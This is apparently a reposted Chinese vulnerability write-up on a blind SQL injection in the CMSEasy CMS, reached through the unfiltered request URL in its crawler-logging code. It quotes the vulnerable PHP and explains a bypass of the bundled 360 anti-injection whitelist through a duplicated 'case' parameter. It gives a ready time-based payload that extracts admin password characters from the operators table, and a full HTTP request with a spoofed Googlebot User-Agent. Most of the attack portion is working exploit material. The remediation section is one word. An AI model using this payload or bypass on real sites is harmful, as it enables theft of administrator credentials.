Cmseasy某处SQL盲注漏洞（绕过360防护） - 网站安全

注入..但是木回显 盲注了..

index.php 84行

stats::getbot(); 由于初始化的时候也没对$_SERVER做过滤的什么措施 导致的注入 stats.php 13行到78行 getbot 这个功能是看蜘蛛的记录 $_SERVER 没过滤 我们只需要把HTTP_USER_AGENT伪造成蜘蛛的就ok了  

public static function getbot() { $ServerName = $_SERVER["SERVER_NAME"]; $ServerPort = $_SERVER["SERVER_PORT"]; $ScriptName = $_SERVER["SCRIPT_NAME"]; $QueryString = $_SERVER["QUERY_STRING"]; $serverip = $_SERVER["REMOTE_ADDR"]; $GetLocationURL=self::geturl(); $agent1 = $_SERVER["HTTP_USER_AGENT"]; $agent=strtolower($agent1); $Bot=""; if(strpos($agent,"googlebot")>-1) { $Bot = "Google"; } if(strpos($agent,"mediapartners-google")>-1) { $Bot = "Google Adsense"; } if(strpos($agent,"baiduspider")>-1) { $Bot = "Baidu"; } if(strpos($agent,"sogou")>-1) { $Bot = "Sogou"; } if(strpos($agent,"yahoo")>-1) { $Bot = "Yahoo!"; } if(strpos($agent,"msn")>-1) { $Bot = "MSN"; } if(strpos($agent,"soso")>-1) { $Bot = "Soso"; } if(strpos($agent,"iaarchiver")>-1) { $Bot = "Alexa"; } if(strpos($agent,"sohu")>-1) { $Bot = "Sohu"; } if(strpos($agent,"sqworm")>-1) { $Bot = "AOL"; } if(strpos($agent,"yodaobot")>-1) { $Bot = "Yodao"; } if(strpos($agent,"iaskspider")>-1) { $Bot = "Iask"; } if(strlen($Bot)>0 &&!front::get('admin_dir')) { $stats = self::getInstance(); $insert = $stats->rec_insert(array('bot'=>$Bot,'url'=>$GetLocationURL,'ip'=>$serverip,'time'=>date('Y-m-d H:i:s'))); //拼接语句 然后进入了查询 但是并没有回显 我们只好 盲注了。时间的.. } } public static function geturl() { 这里 初始化的时候没有过滤.. if(!empty($_SERVER["REQUEST_URI"])) { $scrtName = $_SERVER["REQUEST_URI"]; $nowurl = $scrtName; }else { $scrtName = $_SERVER[" PHP _SELF"]; if(empty($_SERVER["QUERY_STRING"])) { $nowurl = $scrtName; }else { $nowurl = $scrtName."?".$_SERVER["QUERY_STRING"]; } } return (isset($_SERVER["HTTPS"])&&$_SERVER["HTTPS"] == "on")?'https://':'http://'.$_SERVER['HTTP_HOST'].$nowurl; }

这里还有个引入了360防注入的 很好绕过  

$webscan_white_url = array( array('index.php' => 'admin_dir=admin'), array('index.php' => 'case=file'), array('post.php' => 'job=postnew&step=post'), array('edit_space_info.php'=>''), array('index.php' =>'case=admin') );

里面有个 url 白名单 我们只需要 ndex.php?case=file&case=index 这样就行了. case被后面覆盖了~ exP：  

/cmseasy/index.php?case=file&case=index&u=',(sELECT(IF(MID(PASSWORD,2,1)>'1',SLEEP(2),'OK'))FROM(cmseasy_operators)),'0')#

 

 

GET /cmseasy/index.php?case=file&case=index&u=',(sELECT(IF(MID(PASSWORD,2,1)>'1',SLEEP(2),'OK'))FROM(cmseasy_operators)),'0')# HTTP/1.1 Host: 119.99.30.115 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://HdhCmsTestgoogle测试数据/bot. html ) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive

 

 

 

 

修复方案：

过滤

查看更多关于Cmseasy某处SQL盲注漏洞（绕过360防护） - 网站安全的详细内容...